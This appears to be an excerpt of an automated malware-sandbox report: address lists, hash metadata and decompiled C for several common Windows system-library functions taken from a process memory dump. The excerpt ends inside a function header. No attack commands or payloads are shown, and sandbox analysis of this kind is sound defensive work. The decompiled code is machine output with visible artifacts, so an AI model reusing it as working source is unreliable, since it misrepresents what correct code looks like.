0x03455246
0x03455251
0x03455251
0x03496f13
0x03496f17
0x03496f17
0x03496f18
0x03496f1b
0x03496f1f
0x03496f23
0x00000000
0x03496f28
0x03455204
0x03455204
0x03455208
0x00000000
0x03455208
0x03455185
0x03455188
0x0345518a
0x0345518e
0x03455195
0x03496db1
0x03496db5
0x03496db9
0x0345519b
0x0345519b
0x0345519e
0x034551a7
0x034551a9
0x034551a9
0x034551b5
0x034551b8
0x034551bb
0x034551be
0x034551c1
0x034551c5
0x034551c9
0x034551cd
0x034551cd
0x034551d8
0x034551dc
0x034551e0
0x03496dcc
0x03496dd0
0x03496dd5
0x03496ddd
0x03496de1
0x03496de1
0x03496de5
0x03496deb
0x03496df1
0x03496df7
0x03496dfd
0x03496e01
0x03496e05
0x03496e09
0x03496e0d
0x03496e11
0x03496e11
0x034551eb
0x03496e1a
0x03496e1f
0x03496e21
0x03496e23
0x00000000
0x034551f1
0x034551f1
0x00000000
0x034551f1

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20809e1b4707cbebccb9cf839040cc23a48a01762532bc483a251082967f00c8
Instruction ID: f1973a30a550b82f240ee65673b55805dc4670c084b4511503bb6fd74a428498
Opcode Fuzzy Hash: 20809e1b4707cbebccb9cf839040cc23a48a01762532bc483a251082967f00c8
Instruction Fuzzy Hash: ECC132759083808FD754CF28C580A6AFBF1BF89314F184A6EF8998B362D775E845CB46

Uniqueness

Uniqueness Score: -1.00%

Function 034503E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E034503E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x351d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03450548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0346B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0343B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3517c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03447D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03447D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E034A7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03469830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E034A69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3517c04 != 0) {
						_t118 = _v12;
						_t120 = E034AA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3517bd8;
						if( *0x3517bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E034695D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E034699A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E034A3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0342B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0346AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3518474 - 3;
										if( *0x3518474 != 3) {
											 *0x35179dc =  *0x35179dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03447D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03447D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E034A7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3518708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3517b00; // 0x0
							asm("ror esi, cl");
							 *0x351b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E034695D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03437F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x034503f1
0x034503f7
0x034503f9
0x034503fb
0x034503fd
0x03450400
0x0345040a
0x03494c7a
0x03450537
0x03450547
0x03450410
0x03450410
0x03450414
0x03450417
0x0345041a
0x03450421
0x03450424
0x0345042b
0x0345043b
0x0345043e
0x0345043f
0x0345043f
0x03450446
0x03450449
0x0345044c
0x0345044f
0x03450459
0x03494c8d
0x0345045f
0x0345045f
0x0345045f
0x03450467
0x03494c97
0x03494c9d
0x03494ca4
0x03494caa
0x03494caf
0x03494cb1
0x03494cc3
0x03494cb3
0x03494cbc
0x03494cbc
0x03494cc8
0x03494ccb
0x03494cd7
0x03494cda
0x03494cdf
0x03494cdf
0x03494ccb
0x03494ca4
0x0345046d
0x0345046f
0x0345046f
0x03450471
0x03450476
0x0345047a
0x0345047b
0x03450483
0x03450489
0x0345048d
0x00000000
0x00000000
0x03494ce9
0x03494cef
0x03494d22
0x03494d22
0x00000000
0x03494d22
0x03494cf1
0x03494cf7
0x00000000
0x00000000
0x03494cf9
0x03494cff
0x00000000
0x00000000
0x03494d05
0x03494d07
0x00000000
0x00000000
0x03494d0d
0x03494d0f
0x03494d14
0x03494d16
0x00000000
0x00000000
0x03494d1c
0x03494d1c
0x03450499
0x03450535
0x03450535
0x00000000
0x03450535
0x034504a6
0x03494d2c
0x03494d37
0x03494d39
0x03494d3b
0x00000000
0x00000000
0x03494d41
0x03494d48
0x03450527
0x0345052b
0x0345052d
0x03450530
0x03450530
0x00000000
0x0345052b
0x03494d4e
0x034504ac
0x034504ac
0x034504af
0x034504b2
0x034504b7
0x034504b9
0x034504bb
0x034504bd
0x034504bf
0x034504c5
0x034504c9
0x03494d53
0x03494d59
0x03494db9
0x03494dba
0x03494dbf
0x03494dc2
0x03494dc4
0x03494dc7
0x03494dce
0x00000000
0x03494dce
0x03494d5b
0x03494d61
0x00000000
0x00000000
0x03494d63
0x03494d69
0x00000000
0x00000000
0x03494d6b
0x03494d6e
0x03494d74
0x03494d76
0x03494d7c
0x03494d7e
0x03494d84
0x03494d89
0x03494d8c
0x03494d8d
0x03494d92
0x03494d95
0x03494d96
0x03494d98
0x03494d9a
0x03494d9f
0x03494da4
0x03494da6
0x03494da8
0x03494daf
0x03494db1
0x03494db1
0x03494daf
0x03494da6
0x03494d84
0x03494d7c
0x00000000
0x03494d74
0x034504d6
0x03494de1
0x034504dc
0x034504dc
0x034504dc
0x034504e4
0x03494deb
0x03494df1
0x03494df8
0x03494dfe
0x03494e03
0x03494e05
0x03494e17
0x03494e07
0x03494e10
0x03494e10
0x03494e1c
0x03494e1f
0x03494e35
0x03494e35
0x03494e1f
0x03494df8
0x034504f1
0x034504fa
0x03494e3f
0x03494e47
0x03494e5b
0x03494e61
0x03494e67
0x03494e69
0x03494e71
0x03494e73
0x03450500
0x03450500
0x03450500
0x034504fa
0x03450508
0x0345051d
0x0345051d
0x0345051f
0x03450524
0x00000000
0x03450524
0x03450515
0x03450517
0x03494e7a
0x03494e7c
0x00000000
0x00000000
0x03494e85
0x00000000
0x03494e85
0x00000000
0x03450517

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffef1abf763a48ad14749d1e0c09165e8138e87c4fe3fcfe9c57d4bd65cd2e5a
Instruction ID: 02b7f96636d49bf53628539dfa1d64d82a18ad2920fd92e96af1ff5c091bbb73
Opcode Fuzzy Hash: ffef1abf763a48ad14749d1e0c09165e8138e87c4fe3fcfe9c57d4bd65cd2e5a
Instruction Fuzzy Hash: 6991E579E006149FEF21DB69C844BAEBBA4AB05714F0A0267FD20AF3D1D7749D02C789

Uniqueness

Uniqueness Score: -1.00%

Function 0342C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0342C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x351d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03436D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0346B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3517b9c; // 0x0
					_t74 = L03444620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03469650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L034477F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0346F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E034613C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L034477F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03469650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0342c608
0x0342c615
0x0342c625
0x0342c62d
0x0342c635
0x0342c640
0x0342c680
0x0342c687
0x0342c688
0x0342c689
0x0342c694
0x0342c694
0x0342c642
0x0342c64a
0x0342c697
0x03497a25
0x03497a2b
0x03497a2e
0x03497a30
0x03497bea
0x03497bea
0x00000000
0x03497bea
0x03497a36
0x03497a43
0x03497a48
0x03497a4c
0x03497a4e
0x00000000
0x00000000
0x03497a58
0x03497a5a
0x03497a5b
0x03497a5c
0x03497a5d
0x03497a63
0x03497a64
0x03497a6a
0x03497a6c
0x03497a6e
0x034979cb
0x034979cb
0x034979ce
0x034979d0
0x03497a98
0x03497a9b
0x03497a9b
0x03497a9e
0x03497aa1
0x03497bbe
0x03497bbe
0x03497bc0
0x03497be0
0x03497be0
0x03497a01
0x03497a01
0x03497a05
0x03497a07
0x03497a15
0x03497a15
0x03497a1a
0x00000000
0x03497a1a
0x03497bc2
0x03497bc6
0x03497bc9
0x03497bcd
0x03497bcf
0x034979e6
0x034979e6
0x034979eb
0x034979eb
0x034979ef
0x034979f1
0x00000000
0x00000000
0x034979f3
0x034979f5
0x034979ff
0x034979ff
0x00000000
0x034979ff
0x034979f7
0x034979fd
0x00000000
0x00000000
0x00000000
0x034979fd
0x03497bd5
0x03497bd8
0x00000000
0x00000000
0x03497ba9
0x03497bac
0x03497bb0
0x03497bb1
0x03497bb1
0x03497bb6
0x00000000
0x03497bb6
0x03497aa7
0x03497aaa
0x00000000
0x00000000
0x03497ab2
0x03497ab3
0x03497ab5
0x03497aec
0x03497aef
0x03497b25
0x03497b28
0x03497b62
0x03497b64
0x03497b8f
0x03497b92
0x03497b96
0x03497b98
0x00000000
0x00000000
0x03497b9e
0x03497b9f
0x03497ba3
0x00000000
0x03497ba3
0x03497b66
0x03497b68
0x03497ae2
0x03497ae2
0x00000000
0x03497ae2
0x03497b6e
0x03497b72
0x03497b75
0x03497b81
0x03497b85
0x03497b87
0x00000000
0x00000000
0x03497b31
0x03497b34
0x03497b3c
0x03497b45
0x03497b46
0x03497b4f
0x03497b51
0x03497b57
0x03497b59
0x03497b59
0x00000000
0x03497b59
0x03497b77
0x00000000
0x03497b77
0x03497b2a
0x00000000
0x03497b2a
0x03497af1
0x03497af3
0x00000000
0x00000000
0x03497afb
0x03497afc
0x03497afe
0x00000000
0x00000000
0x03497b00
0x03497b03
0x00000000
0x00000000
0x03497b05
0x03497b09
0x03497b0d
0x03497b0f
0x00000000
0x00000000
0x03497b18
0x03497b1d
0x00000000
0x03497b1d
0x03497ab7
0x03497ab9
0x00000000
0x00000000
0x03497abf
0x03497ac1
0x00000000
0x00000000
0x03497ac3
0x03497ac6
0x00000000
0x00000000
0x03497ac8
0x03497acc
0x03497ad0
0x03497ad2
0x00000000
0x00000000
0x03497adb
0x00000000
0x03497adb
0x034979d6
0x034979d9
0x034979dc
0x03497a91
0x03497a94
0x00000000
0x03497a94
0x034979e2
0x00000000
0x034979e2
0x03497a74
0x03497a7a
0x00000000
0x00000000
0x03497a8a
0x03497a21
0x03497a21
0x00000000
0x03497a21
0x0342c650
0x0342c651
0x0342c656
0x0342c65c
0x0342c65d
0x0342c663
0x0342c664
0x0342c66a
0x0342c66e
0x034979c5
0x034979c7
0x00000000
0x034979c7
0x0342c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37f1ebc311ec6bd03be7e5bd0cc507764f82d5ba5dfdbe403a35c24fc7eaa258
Instruction ID: 03ca4389d9d789eb42d2e1bedeb698bafdbe15fdd0de4ff7627e41d5b1f6977e
Opcode Fuzzy Hash: 37f1ebc311ec6bd03be7e5bd0cc507764f82d5ba5dfdbe403a35c24fc7eaa258
Instruction Fuzzy Hash: 3F818A756242019FEF25CE14C880A6BBFA8EF84254F18496FED559F340E331ED45CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 034A6DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E034A6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E034A6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03447D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03469AE0();
					_t87 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E034A795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E034A795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E034A795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E034A795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03444620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E034A6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E034A6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E034A6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E034A6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03447D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03469AE0();
								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03442400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03442400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03442400( &_v52);
							}
							if(_v28 >= 0) {
								return L03442400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x034a6dd4
0x034a6dde
0x034a6de1
0x034a6de3
0x034a6de6
0x034a6de9
0x034a6dec
0x034a6def
0x034a6df2
0x034a6df5
0x034a6dfe
0x034a6e04
0x034a6e09
0x034a6e0d
0x034a6e18
0x034a6e1b
0x034a6e22
0x034a6e2d
0x034a6e30
0x034a6e36
0x034a6e42
0x034a6e4d
0x034a6e50
0x034a6e55
0x034a6e5c
0x034a6e6e
0x034a6e5e
0x034a6e67
0x034a6e67
0x034a6e73
0x034a6e74
0x034a6e77
0x034a6e7c
0x034a6e7d
0x034a6e8e
0x034a6e93
0x034a6e9c
0x034a6ea8
0x034a6eab
0x034a6eac
0x034a6eb3
0x034a6ecd
0x034a6edc
0x034a6ee2
0x034a6ee5
0x034a6ef2
0x034a6efb
0x034a6f01
0x034a6f06
0x034a6f0b
0x034a6f11
0x034a6f1a
0x034a6f22
0x034a6f26
0x034a6f26
0x034a6f33
0x034a6f41
0x034a6f44
0x034a6f47
0x034a6f54
0x034a6f65
0x034a6f77
0x034a6f7c
0x034a6f82
0x034a6f91
0x034a6f99
0x034a6fa3
0x034a6fae
0x034a6fae
0x034a6fba
0x034a6fbb
0x034a6fbc
0x034a6fc1
0x034a6fc2
0x034a6fd3
0x034a6fd8
0x034a6fd8
0x034a6fdf
0x034a6fe8
0x034a6fee
0x034a6fee
0x034a6ff5
0x034a6ffb
0x034a6ffb
0x034a7004
0x00000000
0x034a700a
0x034a7004
0x034a6eb3
0x034a6e9c
0x034a7015

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 6df821f0b8b4affdb636ba95558a6dba80b9688bfd9bd9d765a5fa1f0d011939
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 28718C75A00619AFDB10DFA9C984AAEFBB8FF48304F14446AE504AF250DB34EA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 034BB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E034BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
